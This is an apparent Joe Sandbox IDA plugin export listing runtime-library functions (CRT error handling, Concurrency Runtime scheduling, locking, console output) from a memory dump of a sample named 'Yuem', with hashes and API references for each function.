Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 1e431d3ad7184e7ea8c8297bdd47bd874c13d73852a5db45061f9eb54e3c242c
Instruction ID: 153c58a2dfb03031a23745fbf6be1b8ea7b8c14ccbad1cdd6a64d3fabee2adec
Opcode Fuzzy Hash: 1e431d3ad7184e7ea8c8297bdd47bd874c13d73852a5db45061f9eb54e3c242c
Instruction Fuzzy Hash: ED313DB5A00309DFCF10DFA4C4D0BAE7BB9EB54314F1404A9EA49AB286D731A945CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D1ED2F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00D17E1C: _free.LIBCMT ref: 00D17E2A

Part of subcall function 00D1FD06: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00D261A0,?,00000000,00000000), ref: 00D1FDA8

GetLastError.KERNEL32 ref: 00D1ED97
__dosmaperr.LIBCMT ref: 00D1ED9E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00D1EDDD
__dosmaperr.LIBCMT ref: 00D1EDE4

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 24a05c104e937a04bd4ecbcd5c1e3fe90f199cb20ffb779d2dcaaf2d7c158653
Instruction ID: 96254b6680e6d2e5b93e21f86324e2bc471f2ce9ac1e92e28641a0b1da08f6f4
Opcode Fuzzy Hash: 24a05c104e937a04bd4ecbcd5c1e3fe90f199cb20ffb779d2dcaaf2d7c158653
Instruction Fuzzy Hash: 02217471604216BF9B10AF65BC819ABB7ADEF043647148524F965D7150EF30ECC19BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D11EE8 Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 00D11F39
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00D11F21

Part of subcall function 00D0A37F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00D0A3A0

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00D11F9C
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,00D42410), ref: 00D11FA1

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 20e75926922710218e8a0debf79c561a0c4db0ed8bd226d2e369f48c1ebd1d84
Instruction ID: f5c61a443faed65cd9f4f3068af9e0f68307492c46e2e326ed9cbc59f964e867
Opcode Fuzzy Hash: 20e75926922710218e8a0debf79c561a0c4db0ed8bd226d2e369f48c1ebd1d84
Instruction Fuzzy Hash: 4D21A475600214BFC710AB68DC45ABDB7BCEF48760B044459FA1AE32D2DB70AD028AB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D0B0E5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D0B0EC
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00D0B138
std::bad_exception::bad_exception.LIBCMT ref: 00D0B14E
std::bad_exception::bad_exception.LIBCMT ref: 00D0B1BA

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 7e80480f78b92dfc21a6d34810fc598909a8d71f040adf37d8ebb007150e6083
Instruction ID: 8403c1ee7c8a56c6affcc365441f892345d19af9e20b0d5791e56816b41cf2a6
Opcode Fuzzy Hash: 7e80480f78b92dfc21a6d34810fc598909a8d71f040adf37d8ebb007150e6083
Instruction Fuzzy Hash: EF21C576905214AFDB05EF64D892EEDB7B0EF15320F50002AF109AB2D1DB71AE46CB76

Uniqueness

Uniqueness Score: -1.00%

Function 00D1BA51 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00D17D9A,?,?,?,?,00D189CE,?), ref: 00D1BA56
_free.LIBCMT ref: 00D1BAB3
_free.LIBCMT ref: 00D1BAE9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00D17D9A,?,?,?,?,00D189CE,?), ref: 00D1BAF4

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: aac3e2a1e502bab8d3e9ff6ba3e29f1f306a5997cf3444c7381a9f1cbcf7e836
Instruction ID: dba3c19a33d36c1d0bca1de0afc49995c2ae33427cb50323bc849d54ba1ecfd5
Opcode Fuzzy Hash: aac3e2a1e502bab8d3e9ff6ba3e29f1f306a5997cf3444c7381a9f1cbcf7e836
Instruction Fuzzy Hash: 8E1106362947027BCA1066B87CC5FFA265ADFD13747680226F520D22D2EFA18CC29630

Uniqueness

Uniqueness Score: -1.00%

Function 00D1BBA8 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00D18968,00CE2147), ref: 00D1BBAD
_free.LIBCMT ref: 00D1BC0A
_free.LIBCMT ref: 00D1BC40
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00D18968,00CE2147), ref: 00D1BC4B

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 5b20ec24152350bf89933b0c399eac9175c37f0ec5ce3f5d7dbbd291e49c6c83
Instruction ID: b20b3b56ec75a3570315f1dcf99346806050b7537a3d8a2236be40ae7eab0da4
Opcode Fuzzy Hash: 5b20ec24152350bf89933b0c399eac9175c37f0ec5ce3f5d7dbbd291e49c6c83
Instruction Fuzzy Hash: BA1125362847023BCA002AB87CC5FEA225BEBD1374B680226F510C22D2EF308CC29170

Uniqueness

Uniqueness Score: -1.00%

Function 00D0073D Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00D0075F

Part of subcall function 00D0091B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00D068D6

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00D00780

Part of subcall function 00D01602: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00D0161E

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 00D0079C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00D007A3

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 06ee0f1d29ed260853ba57a8ca905eb178f3b27be3ba15dd88d20102709a7093
Instruction ID: e6efa5909919af3e09e96c8576deca39834bd0a706d3188a3e2c76fa19fd649c
Opcode Fuzzy Hash: 06ee0f1d29ed260853ba57a8ca905eb178f3b27be3ba15dd88d20102709a7093
Instruction Fuzzy Hash: 340104B1500309BFD720AF648C85B9BBFACDF51340F14492AB55D921C2D7B4E9448BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D1480E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00D14828
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00D1483C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00D14854
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00D1486C

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: b8276cc37b83146e42cd3b0b2ffe436f95b37bf61f5456eacb11218f722f35b0
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 3D01D132600214B7CF16AE65E851AEFB7E9EF95360F040015FD16AB282DE31ED5196F0

Uniqueness

Uniqueness Score: -1.00%

Function 00D1CB95 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00D1CC91,00000000,?,00D23316,00000000,00000000,00D1CC91,?,?,00000000,00000000,00000001), ref: 00D1CBAB
GetLastError.KERNEL32(?,00D23316,00000000,00000000,00D1CC91,?,?,00000000,00000000,00000001,00000000,00000000,?,00D1CC91,00000000,00000104), ref: 00D1CBB5
__dosmaperr.LIBCMT ref: 00D1CBBC

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: eb78e8ce032a432cb255638e8ddcf44866f853e1447e4d1544725690b212236a
Instruction ID: dd4c16818fb692d923056fb86aa7e803de23aa6638c54d9a37e74a63e6891504
Opcode Fuzzy Hash: eb78e8ce032a432cb255638e8ddcf44866f853e1447e4d1544725690b212236a
Instruction Fuzzy Hash: 27F08632644215BBCB105FA6ED06D9AFF69FF443603159111F519D6210CF31E890DBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D1CB2C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00D1CC91,00000000,?,00D2338B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00D1CB42
GetLastError.KERNEL32(?,00D2338B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00D1CC91,00000000,00000104,?), ref: 00D1CB4C
__dosmaperr.LIBCMT ref: 00D1CB53

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 860e65f6cd1639791832c641413ef710ea85c1ef8157c024d87acaf17c512705
Instruction ID: 061692e5ad3e8b5c0f5b6f8b78bc759571ff3487f4e12dbdf7b8bdf9b18ef94f
Opcode Fuzzy Hash: 860e65f6cd1639791832c641413ef710ea85c1ef8157c024d87acaf17c512705
Instruction Fuzzy Hash: 8CF06D32604215BBCB205BA6ED0ADAAFFA9EF447A03049111F619D6120CF31E8A0DBF0

Uniqueness

Uniqueness Score: -1.00%

Function 00D06455 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00D013B6: TlsGetValue.KERNEL32(?,?,00D00937,00D00764,?,?), ref: 00D013BC

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00D0647F

Part of subcall function 00D0F75E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00D0F785
Part of subcall function 00D0F75E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00D0F79E
Part of subcall function 00D0F75E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00D0F814
Part of subcall function 00D0F75E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00D0F81C

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00D0648D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00D06497
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00D064A1

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: c96f081aa9537496fadf03deb0037546f0f15d7f4a9cf6fbf4b6c2fb113171fa
Instruction ID: f41c3711d94ce5cdac32ffadbbc6a102124957a4b86d6b7c7977b21a2beedcb3
Opcode Fuzzy Hash: c96f081aa9537496fadf03deb0037546f0f15d7f4a9cf6fbf4b6c2fb113171fa
Instruction Fuzzy Hash: C2F04035A041143BCB21B3308812AADFA28DFC0B20B04002AF419936C3DF60DA1587F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0A960 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00D0A969

Part of subcall function 00D0091B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00D068D6

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00D0A98D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00D0A9A0
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00D0A9A9

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: dc1cf2293e1ad88d9b2ffc715359176df21e8a6054a41e1170f9a89de903f0f8
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: 8FF0A731300B206FE525AB1C6811BAA63D4DF84311F01C419E55F972C3CE64E8828FB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D27EAF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00CE8B40,0000000F,00D42A70,00000000,00CE8B40,?,00D2659A,00CE8B40,00000001,00CE8B40,00CE8B40,?,00D21474,00000000,?,00CE8B40), ref: 00D27EC6
GetLastError.KERNEL32(?,00D2659A,00CE8B40,00000001,00CE8B40,00CE8B40,?,00D21474,00000000,?,00CE8B40,00000000,00CE8B40,?,00D219C8,00CE8B40), ref: 00D27ED2

Part of subcall function 00D27E98: CloseHandle.KERNEL32(FFFFFFFE,00D27EE2,?,00D2659A,00CE8B40,00000001,00CE8B40,00CE8B40,?,00D21474,00000000,?,00CE8B40,00000000,00CE8B40), ref: 00D27EA8

___initconout.LIBCMT ref: 00D27EE2

Part of subcall function 00D27E5A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D27E89,00D26587,00CE8B40,?,00D21474,00000000,?,00CE8B40,00000000), ref: 00D27E6D

WriteConsoleW.KERNEL32(00CE8B40,0000000F,00D42A70,00000000,?,00D2659A,00CE8B40,00000001,00CE8B40,00CE8B40,?,00D21474,00000000,?,00CE8B40,00000000), ref: 00D27EF7

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 769092695f61b17f92d7679f802eda9cc48d04f3876bfc77e4825362d1a80336
Instruction ID: 10c8078fbcc170bf7c704329b17c437f6099c0fe5871298cef840211f6fcde7e
Opcode Fuzzy Hash: 769092695f61b17f92d7679f802eda9cc48d04f3876bfc77e4825362d1a80336
Instruction Fuzzy Hash: 28F0F83A40422AFBCF321F95EC0499A3F66EB1A3A1B054051FA19C5220C6328C20DBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CFE5EE Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00CFE58B,00000064), ref: 00CFE611
LeaveCriticalSection.KERNEL32(00D48640,00D49578,?,00CFE58B,00000064,?,74DF0F00,?,00CE7A3D,00D49578), ref: 00CFE61B
WaitForSingleObjectEx.KERNEL32(00D49578,00000000,?,00CFE58B,00000064,?,74DF0F00,?,00CE7A3D,00D49578), ref: 00CFE62C
EnterCriticalSection.KERNEL32(00D48640,?,00CFE58B,00000064,?,74DF0F00,?,00CE7A3D,00D49578), ref: 00CFE633

Memory Dump Source

Source File: 00000016.00000002.2539662432.0000000000CE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000016.00000002.2539635224.0000000000CE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539712258.0000000000D32000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539746058.0000000000D45000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539777023.0000000000D47000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539804397.0000000000D48000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000016.00000002.2539830934.0000000000D4A000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_ce0000_Yuem.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: b447c0c13da8c8c5f3bd42269526bc4439206cce653f0c5d66e7c99d687aafb9
Instruction ID: 1531c2064d715d777de267e93ba056debebd9c57892a1c260e3718a7b6ee78dd
Opcode Fuzzy Hash: b447c0c13da8c8c5f3bd42269526bc4439206cce653f0c5d66e7c99d687aafb9
Instruction Fuzzy Hash: E6E01236941738ABC6822F55FC08AAD7F24AB59BD1B424011F609E6370CB615910BBF9

Uniqueness

Uniqueness Score: -1.00%

Function 00D0041D Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00D00421

Part of subcall function 00D00DB8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00D00DD9
Part of subcall function 00D00DB8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00D00E10
Part of subcall function 00D00DB8: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00D00E1C

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00D0042D

Part of subcall function 00D0085F: Concurrency::critical_section::unlock.LIBCMT ref: 00D00883

Concurrency::Context::Block.LIBCONCRT ref: 00D00432

Part of subcall function 00D017B6: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00D017B8

Concurrency::critical_section::lock.LIBCONCRT ref: 00D00452

Part of subcall function 00D00CE1: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00D00CFC
